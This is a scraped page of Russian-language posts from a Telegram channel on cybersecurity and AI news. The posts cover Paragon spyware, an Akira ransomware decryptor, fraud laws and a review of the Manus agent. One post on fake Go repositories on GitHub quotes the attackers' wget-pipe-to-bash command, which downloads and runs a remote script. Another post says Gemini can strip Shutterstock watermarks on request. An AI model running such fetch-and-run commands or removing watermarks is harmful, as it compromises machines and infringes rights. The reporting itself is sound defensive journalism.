Russian OSINT – Telegram
Russian OSINT
43K subscribers
4.35K photos
305 videos
107 files
4.01K links
Авторский канал: кибербезопасность, искусственный интеллект и IT.

🚀Лаборатория OSINT
@russian_osint_lab

🤝Реклама
@russian_osint_pr
https://telega.in/c/Russian_OSINT

📲Связь
@russian_osint_bot
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🍿Кто-то решил почувствовать себя в роли главного героя видеоигры Watch Dogs.

💻В сети появилось видео, где исследователь демонстрирует перехват хэндшейка 🖥WPA2 с помощью смарт-часов TicWatch Pro 3 и Kali NetHunter. Трюк выполнялся со стареньким роутером TP-Link.

А-ля панагочи на смарт-часах.

🛡 Базовые меры защиты: Wi-Fi пароль должен быть длинным (не менее 16 символов), отключение WPS на роутере, фильтрация MAC-адресов, периодическая смена пароля, регулярное обновление прошивки, WIDS и мониторинг сети.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🤖Стартап по производству роботов-гуманоидов Figure планирует выпускать до 100 000 роботов в год

Figure анонсировали "первую в мире" 🏭 высокопроизводительную фабрику по массовому выпуску гуманоидных роботов под названием "BotQ". Компания контролирует весь производственный процесс собственными силами: от производства компонентов до финальной сборки (процесс производства на видео). Об этом сообщил основатель стартапа в социальной сети Х.

По его словам, изначально планировалось производить до 12 000 гуманоидов в год, но сейчас амбиции Figure растут и компания хочет масштабироваться до выпуска 100 000 единиц роботов в ближайшие 4 года.

За последние восемь месяцев команда инженеров Figure разработала эффективный, масштабируемый и полностью интегрированный производственный процесс, обеспечивающий выпуск качественных и надежных роботов.

— сообщает компания.

😕 А теперь 🍒вишенка на 🍰торте:

Одной из главных инноваций BotQ станет использование 🤖гуманоидных роботов Figure для сборки🤖других роботов.

Фактически в Figure добиваются того, чтобы со временем роботы воспроизводили сами себя на конвейере.

👆🙂 Вспоминается повесть Филипа К. Дика «Вторая модель» (фильм Крикуны).

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
1️⃣ В новой бесплатной модельке 🌐 Gemini 2.0 Flash (Image Generation) Experimental можно убирать водяные знаки со стоковых фотографий (пример Shutterstock). Достаточно попросить в окне промпта — remove watermarks from this image.

2️⃣ Гугловская моделька в отличие от ChatGPT, Grok и прочих умеет классно в 🟦Photoshop. Достаточно загрузить изображение и попросить сделать визуальные изменения, регулируя 🥵temperature (отвечает за креативность ответов).

3️⃣ Можно менять фон (🤥 котик) или убирать предметы (пример с ✈️самолетом).

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4
kaspersky_ics_cert_threat_landscape_for_industrial_automation_systems.pdf
6.1 MB
📄 Ландшафт угроз для систем промышленной автоматизации. Четвертый квартал 2024 — регионы.

👉 Источник: Kaspersky ICS CERT

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 ❗️Мошенники начали охотиться за биометрией россиян

Как рассказали ТАСС в 🇷🇺 МВД, мошенники под разными предлогами стали звонить людям по видеосвязи с целью записи голоса, получения других биометрических данных, которые потом используют для списания средств в банке.

Мошенники могут звонить под предлогом проверки качества связи якобы от оператора, предлагать услуги или товары, проводить мнимые опросы. При этом человеку задают вопросы, а он на них отвечает. Задача мошенников заполучить запись голоса абонента с ключевым словом ⚠️"да", - говорится в материалах.

🤖 Поскольку некоторые банки уже ввели, а многие только вводят биометрическую идентификацию клиентов, записанные во время разговоры голос человека и его лицо, позволяет мошенникам совершить хищение денег.

🤿"Записанное мошенниками слово "да" и другие фразы они могут ◀️ использовать при биометрической идентификации якобы согласием абонента на списание средств", — пояснили в ведомстве.

====

В связи с появившейся схемой мошенничества в МВД призвали к осторожности при звонках с неизвестных номеров. Если их избежать не удалось, то лучше следить за своей речью и не произносить "ключевые фразы" и не говорить "да", советуют в ведомстве. "Лучше сразу же завершить такой разговор", - говорится в материалах киберполиции.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🇺🇸 Конгрессмены-республиканцы запросили документы от DHS по 🇨🇳 китайским киберугрозам Volt Typhoon и Salt Typhoon

Республиканцы из Комитета по внутренней безопасности Палаты представителей требуют от 👮Министерства внутренней безопасности (DHS) США раскрыть внутренние документы, касающиеся кибершпионских группировок Volt Typhoon и Salt Typhoon, связанных якобы с правительством 🇨🇳Китая. В понедельник комитет отправил запрос главе DHS Кристи Ноэм, требуя все документы, связанные с деятельностью этих групп с начала президентства Байдена. Администрацию Байдена критикуют за недостаточную прозрачность и вялую реакцию на эти кибератаки.

По данным разведки США, Volt Typhoon якобы в течение как минимум 5 лет взламывали системы КИИ и объекты гражданской инфраструктуры. Разговоры снова не обошли стороной телеком:

Якобы китайские хакеры могли даже прослушивать разговоры высокопоставленных чиновников, включая президента США Дональда Трампа и Джей Ди Вэнса.


Комитет по национальной безопасности выразил обеспокоенность тем, что администрация Байдена не обеспечила достаточную прозрачность в расследовании этих атак. Законодатели также требуют от DHS предоставить информацию о том, когда именно CISA впервые узнала о группах Volt Typhoon и Salt Typhoon, а также хронологию ответных действий в отношении хакеров. Все необходимые документы DHS должны быть переданы комитету до 31 марта 2025 года.

😱 Республиканцы на прошлой неделе обратились к 🇺🇸 администрации Трампа с требованием усилить потенциал возможностей по проведению киберопераций против Китая.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷❗️Массовая атака на Go-разработчиков через поддельные GitHub-репозитории

В сообществе Go-разработчиков случился неприятный инцидент. Представители популярного проекта Atlas заметили, что злоумышленники "клонировали" один из их репозиториев на GitHub (GORM Provider), накрутили ⭐️ звёзды с помощью фейковых аккаунтов и 🦠внедрили вредоносный код, который выполняется при запуске. Проблема оказалась масштабнее, чем предполагалось изначально. В сети обнаружены десятки других репозиториев, использующих аналогичный метод атаки.

Поддельный репозиторий — ↔️ https://github[
.]com/readyrevena/atlas-provider-gorm (удалён) содержал скрытый код, загружающий и исполняющий вредоносный Bash-скрипт с удалённого сервера через команду:
wget -O - https://reque***ne.fun/storage/de373d0df/a31546bf | /bin/bash &


Ззлоумышленники потенциально могут выполнить код на машине разработчика: установить вредоносное ПО, шпионские программы или 🔒 шифровальщики. Исследователи безопасности обнаружили более 690 потенциально опасных репозиториев, получивших звёзды от фейковых аккаунтов, включая:

https://github.com/esteemedpar/guetzli-go (удалено)
https://github.com/closeddigit/macos-totp-cli (удалено)
https://github.com/frillymacaro/ai-search4ai-go (удалено)

и множество других.

Замечены вредоносные клоны: kubernixos, shelly-bulk-update, terraform-provider-atlas, gonet.

Ещё проблема состоит в том, что Go-разработчики часто устанавливают зависимости через go get <URL>, что делает возможным случайное добавление поддельного пакета в проект. В отличие от экосистемы npm или PyPI, у Go отсутствует централизованный механизм валидации пакетов.

🛡 Звучат различные идеи по улучшению безопасности:

1️⃣ Одобрение модулей перед публикацией (Modules Approval Process).
2️⃣ Введение доверенных издателей (Trusted Publishers).
3️⃣ Ограничения на установку неподтвержденных пакетов в go.mod.
4️⃣ Автоматическая проверка пакетов на вредоносный код в Go Proxy.
5️⃣ Более оперативное удаление вредоносных пакетов и форков на GitHub.
6️⃣ Создание инструментов для анализа зависимостей (аналог npm audit).

👆 Сообщество начало активно репортить вредоносные репозитории в саппорт GitHub. Microsoft пока только частично приняла меры по удалению репозиториев с сюрпризом. Некоторые всё ещё остаются доступны.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🧑‍🎓🇺🇸 Студенты Стэнфорда устремились в военную сферу, позабыв о Кремниевой долине

Всего несколько лет назад работа в оборонной индустрии считалась среди студентов Стэнфорда не просто непопулярной, а почти «запятнанной». Однако ситуация cо временем резко изменилась благодаря усилиям государства. Теперь выпускники престижного университета все чаще выбирают карьеру в национальной безопасности, а стартапы в сфере военных технологий переживают настоящий бум.

Переломный момент для многих студентов наступил в 2022 году с курсом «Шпионы, ложь и алгоритмы», после которого интерес к оборонным технологиям резко возрос. Студентка факультета политологии Дивья Ганесан раньше смотрела на контракты с военными довольно скептически, но сейчас активно работает в этом направлении. Она основала студенческую организацию Stanford Women in National Security и стажировалась в АНБ , а также СISA. Сегодня многие её друзья работают в Palantir, который с приходом Дональда Трампа снова чувствует себя как рыба в воде.

Интерес студентов к военным технологиям резко возрос. Утверждается, что многие бросают учебу ради стартапов в оборонке и стремятся попасть в Palantir, Anduril и так далее. Программа "Взлом ради обороны", где студенты решают задачи военных, стала одной из самых популярных универе. В 2021 году университет открыл финансируемый ВМС США центр Gordian Knot, чтобы координировать работу в этом направлении.

Влияние войны на Украине и роста напряженности с 🇨🇳Китаем ощущается повсюду.

"США десятилетиями доминировали в мире, но Китай показывает взрывной рост, и теперь мы можем проиграть. Это вопрос экзистенциальный"

— говорит бывший студент Эндрю Фанг, который ради оборонного стартапа ушел из университета раньше на два года.

Инвесторы тоже не остаются в стороне. Вложения венчурного капитала в оборонные стартапы выросли в 10 раз с 2019 года, достигнув $3 млрд в 2024 году.

"Если что-то вспыхнет в Тихоокеанском регионе, то деньги польются рекой, как это было в Ираке и Афганистане"

— говорит один из студентов Стэнфорда.

Профессор Терри Виноград, известный своими антивоенными взглядами, обеспокоен тем, что растущий интерес к оборонной сфере может быть продиктован желанием инвесторов 👹 извлекать максимальную прибыль из будущих конфликтов, чем реальной необходимостью. Критики также указывают на возможные последствия тесного слияния частного сектора с военными, так как это может привести к геополитической эскалации и глобальной нестабильности.

Если раньше мечтой выпускников были Google и запрещенная в РФ Meta, то теперь их внимание приковано к технологиям, которые определяют будущее войн и национальной безопасности США.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
🇷🇺 Государственная Дума приняла в первом чтении законопроект, направленный на защиту граждан от телефонных мошенников и кибермошенников

Как сообщается на сайт duma.gov.ru, рассмотрение во втором чтении должно быть в приоритетном порядке, подчеркнул в ходе пленарного заседания Председатель ГД Вячеслав Володин. Он сообщил, что оно может состояться уже 25 марта.

Законопроектом, в частности, закрепляется возможность онлайн-обмена информацией между государственными органами, банками и цифровыми платформами. В пояснительной записке к документу отмечено, что автоматический мониторинг позволит практически моментально выявлять подозрительные действия, блокировать их и уведомлять правоохранительные органы о потенциальных преступлениях.

Кроме этого, инициативой:

💠вводится обязательная маркировка звонков от организаций и вызовов с международных номеров;

💠предлагается запретить сотрудникам государственных органов, банков и операторов связи и иным субъектам общаться с гражданами и клиентами через мессенджеры;

💠предлагается создать информационную антифрод-платформу, на которой будут храниться образцы голосов тех, кто использует доверие граждан в корыстных целях;

💠устанавливается запрет на передачу сим-карт третьим лицам;

💠для граждан вводится возможность установления запрета на заключение договоров об оказании услуг подвижной радиотелефонной связи без личного присутствия (запрет можно будет установить через портал «Госуслуги» или при обращении в МФЦ, а снять – только при личном посещении МФЦ).

Предусмотрены и иные нововведения, направленные на защиту от противоправных деяний, совершаемых с использованием информационных технологий. Законопроект объединил около 30 мер борьбы с мошенниками.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Вчера решил попробовать протестировать китайского зверя под названием 🇨🇳Manus.

Многие из вас видели в сети видео, где на столе стоит монитор и ИИ-агент "что-то там делает, управляя 50 аккаунтами в соц.сетях". Якобы это Manus. Нет, друзья, это не Manus. Опроверг сам соучредитель.

Соучредитель Manus AI здесь! Спасибо за ваш интерес к Manus, но это видео определенно НЕ Manus 🤣. Наш официальный аккаунт — ManusAI_HQ. Manus — это веб-агент ИИ, как OpenAI Operator/DeepResearch, а не VNC для смартфонов.

— написал Ичао "Пик" Джи.

Manus это ИИ-агент, который ищет как Perplexity в режиме Deep Research или ChatGPT Deep research.

======

Отправил заявку на сайте Manus. Команда проекта буквально в течение 2 часов очень шустро одобрила мне доступ. За оперативность 5+.

Поделюсь пока только общими впечатлениями. Не претендую на истину.

Тестировал в течение одного дня. Даётся возможность сделать 3 глобальных ресерч запроса - так называемые trial tasks. И это бесплатно.

И как? Понравилось? Да, не то слово. Крайне положительные эмоции. Я бы даже сказал🤖пушка, он же китайский скайнет на минималках.

ИИ-агенту Manus была поставлена классическая маркетинговая задача исследовать рынок в регионах XYZ и оценить потенциал производства продуктов A/Б на ближайшие 5 лет. Промпт примерно на 3000 символов.

📄 Спустя 3 часа поисков в сети Manus выдал на английском мегарепорт на 57 страниц в pdf цифрами, таблицами, расчётами, блекджеком и анализом трендов. Написал оглавление и даже методологию.

Цифры выглядят правдоподобными в отчёте. Часть совпадает с тем, что было исследовано ранее. Проверю остальное на днях. Допускаю, что как и любой другой ИИ-агент он может ошибаться.

Но то что писали в сети ранее с точки зрения критики про Manus (якобы тупит и не даёт источники) — ничего такого не увидел. Может промпт некорректно составили или плохо разъяснили задачу?

С учётом повсеместного информационного шума лучше ручками перепроверять конкретно в рамках своих задач. Например, одному человеку подходит, а другому может не подойти. И наоборот.

В любом случае конкуренция со стороны Китая это большой плюс для нас всех. Пользователи от этого только выигрывают.

Какие есть явные минусы у Manus? Лимит контекста. Пока это главная ахиллесова пята. Разрабы удвоили его недавно, но мне не помогло.

Благодаря начальному промпту получился слишком развернутый ответ в pdf (57 страниц). После основного запроса попросил его ответить на ещё 4 дополнительных запроса в рамках одного таска, чтобы уточнить кое-какие детали, но он заглох. Manus has stopped because the context is too long, please start a new chat. Важно учитывать, что можно легко выйти за "контекст", когда сильно много букав. ИИ-модели не любят много букав читать.

Кстати, пробовал ранее практически идентичный маркетинговый запрос в Perplexity, ChatGPT, Grok и других (режим deep research или deepsearch) — ответы нервно курят в сторонке по сравнению с результатами китайца. Это субъективная точка зрения, но в моем конкретном случае это так. Среди ИИ-агентов/моделей в режиме deep research китайскому Manus смело даю 1 место.

У кого будет желание и возможность — обязательно пробуйте.

Промпт лучше писать на английском, чтобы он вас лучше понимал. Обязательно попросите его искать строго научные/надёжные источники, а не вики и прочее. В моём кейсе Manus выдал качественные научные референсы и аналитические репорты за 2023-2024, как я и просил.

👍 В очередной раз убеждаюсь, что китайские инженеры умеют в уникальные ИИ-продукты.

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🥷❗️Как шпионское ПО от Paragon проникало в устройства жертв через 📲Whatsapp?

Появились новые подробности от Citizenlab и Джона Скотт-Рейлтона по поводу шпионского ПО Graphite от Paragon.

Атака на WhatsApp с использованием шпионского ПО Paragon, известного как Graphite, представляет собой атаку нулевого клика (zero-click), при которой жертве не нужно выполнять никаких действий, чтобы её устройство было взломано. Специалисты Citizenlab утверждают, что атака выглядит примерно следующим образом:

1️⃣ Заражение могло происходить через отправление PDF в WhatsApp-группу. Атакующий добавляет жертву в группу и отправляет вредоносный PDF. Либо жертва и хакер уже находятся в одной группе.

2️⃣ Или заражение могло происходить через личное сообщение с отправлением PDF. Потом сообщение удаляется, якобы случайно кто-то ошибся.

3️⃣ Жертве не требовалось открывать какой-либо 📄файл или совершать другие действия.

4️⃣ Уязвимость в механизме обработки PDF-документов в WhatsApp могла автоматически приводить к выполнению вредоносного кода.

5️⃣ Шпионское ПО Paragon выходит за пределы изолированной среды Android (sandbox escape) и может заражать другие приложения на устройстве.

🕷Чем опасен этот метод атаки?
💠Жертве не нужно предпринимать никаких действий, чтобы устройство было заражено (zero-click exploit).
💠Шпионское ПО получает доступ к зашифрованным данным WhatsApp.
💠Атака может оставаться незамеченной долгое время, поскольку Graphite интегрируется в уже существующие процессы.
💠Выход за пределы WhatsApp. Шпионское ПО может затронуть другие приложения и сервисы.

🔍Почему Citizenlab убеждены в том, что к этому заражению причастна компания Paragon?

1️⃣ Цепочка инфраструктуры и фингерпринтинг
🔻 Citizen Lab идентифицировали серверную инфраструктуру, связанную с Paragon.
🔻 В рамках этой сети были найдены цифровые сертификаты, включая сертификат с именем "Graphite".
🔻 Анализ Fingerprint P1 и поиск по базе Censys выявил 150 связанных сертификатов.
🔻 Примерно половина из них активно использовалась на IP-адресах.
🔻 Часть этих сертификатов была связана с IP-адресами в Израиле, где базируется Paragon.

2️⃣ Методология атаки совпадает с описанными возможностями Graphite
🔻 Graphite не берет полный контроль над устройством, как Pegasus, а инфильтрирует мессенджеры.
🔻 WhatsApp был заражен, а затем шпионское ПО распространялось на другие приложения. Cовпадает с техническим описанием Graphite.
🔻 В ходе анализа зараженных устройств был обнаружен артефакт BIGPRETZEL, который был идентифицирован как уникальный признак заражения Graphite.

3️⃣ BIGPRETZEL – индикатор заражения Graphite
🔻 Исследователи нашли уникальный цифровой артефакт BIGPRETZEL в памяти зараженных устройств.
🔻 Этот же артефакт WhatsApp подтвердил как признак заражения Graphite.

4️⃣ Признания Paragon и их действия после утечки
🔻 После публикации расследования Paragon не отрицал причастность, а лишь заявил, что в отчете есть «неточности», но отказался их уточнить.
🔻 Paragon разорвал контракты с итальянскими клиентами сразу после публикации расследования.

Уязвимость была исправлена Whatsapp без необходимости действий со стороны пользователей. После этого компания уведомила около 90 пользователей из более чем 20 стран, включая журналистов и активистов, о том, что они могли стать жертвами этой атаки.

👆 Некоторые уже задумались сделать ограничение на добавление себя в группы. ​

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
3
Канал 🔨SecAtor@true_secator пишет интересное:

Исследователь Йоханес Нугрохо раскрыл подробности метода взлома для шифрования Akira ransomware и восстановления исходных файлов.

На основе результатов своего исследования разработал дешифратор для Linux-версии Akira, который задействует вычислительную мощность GPU для извлечения ключа дешифрования и разблокировки файлов.

При этом сам метод не универсален и работает только с вариантами Akira 2024.

За разработку дешифратора Йоханес взялся после обращения его друга с просьбой о помощи.

Тогда он рассчитал, что зашифрованную систему можно взломать за неделю, учитывая, что Akira генерирует ключи шифрования с использованием временных меток (в наносекундах).

Но в виду непредвиденных сложностей на это потребовалось три недели и 1200 долларов на аренду мощности графического процессора, которая позволила взломать ключ шифрования.

Дешифратор работает иначе, нежели традиционные инструменты дешифрования.

Он перебирает ключи шифрования (уникальные для каждого файла) в расчете на то, что шифратор Akira генерирует свои ключи шифрования на основе текущего времени в качестве начального числа.

Начальное значение шифрования - это данные, используемые с криптографическими функциями для генерации сильных, непредсказуемых ключей шифрования.

Akira
полагается не на один момент времени, а использует четыре, каждый с наносекундным разрешением.

Генерация ключа сложна, включает 1500 раундов SHA-256 для каждой временной метки.

Уровень точности временных меток реализует более миллиарда возможных значений в секунду, что затрудняет подбор ключей с помощью брута.

Кроме того, Akira на Linux шифрует несколько файлов одновременно, используя многопоточность, что затрудняет определение используемой временной метки и еще больше усложняет ситуацию.

Исследователь сузил возможные временные метки, просмотрев файлы журналов, которыми поделился его друг.

Это позволило увидеть, когда была запущена программа-вымогатель, метаданные файла для оценки времени завершения шифрования и создать бенчмарки шифрования на различном оборудовании для создания предсказуемых профилей.

Первые попытки с использованием RTX 3060 были слишком долгими, с потолком всего в 60 млн. тестов шифрования в секунду. Обновление до RTC 3090 тоже не помогло.

В конце концов исследователь обратился к облачным сервисам RunPod и Vast.ai, чтобы подтвердить эффективность своего инструмента.

В частности, он задействовал шестнадцать графических процессоров RTX 4090 для подбора ключа дешифрования примерно за 10 часов.

Однако в зависимости от количества зашифрованных файлов, требующих восстановления, процесс может занять несколько дней.

Исследователь отметил в своей статье, что эксперты по графическим процессорам могут оптимизировать его код, поэтому производительность, вероятно, может быть улучшена.

Дешифратор доступен на GitHub вместе с инструкциями по восстановлению файлов, зашифрованных Akira.
Please open Telegram to view this post
VIEW IN TELEGRAM
PDF_Analiticheskiy-otchet-po-pentestu-2024.pdf
4.6 MB
📄 У ГК «Солар» вышел отчет "Ключевые уязвимости информационных систем российских компаний" за 2024.

▶️Внешний периметр 91% компаний оказался уязвим к атакам, успешная реализация которых может привести к проникновению во внутреннюю сеть, компрометации узлов внешнего периметра или получению доступа к чувствительным данным и критичным внешним системам и приложениям.

▶️Одними из самых распространенных проблем внешних периметров российских компаний остаются слабые пароли (38%) и устаревшие версии программного обеспечения, подверженные различным уязвимостям (32%);

▶️Самым распространенным недостатком веб-приложений оказалось раскрытие отладочной и конфигурационной информации (70%).

▶️Самые распространенные недостатки серверной части мобильных приложений связаны с раскрытием отладочной и конфигурационной информации (53%) и некорректной реализацией контроля доступа (40%). А основной проблемой клиентской части в 2024 году стало отсутствие обфускации исходного кода мобильного приложения (40%).

👉 Источник: https://rt-solar.ru/upload/iblock/167/nwp1jck6a3smiv3v8jc0uyv33araze5p/PDF_Analiticheskiy-otchet-po-pentestu-2024.pdf

@Russian_OSINT
Please open Telegram to view this post
VIEW IN TELEGRAM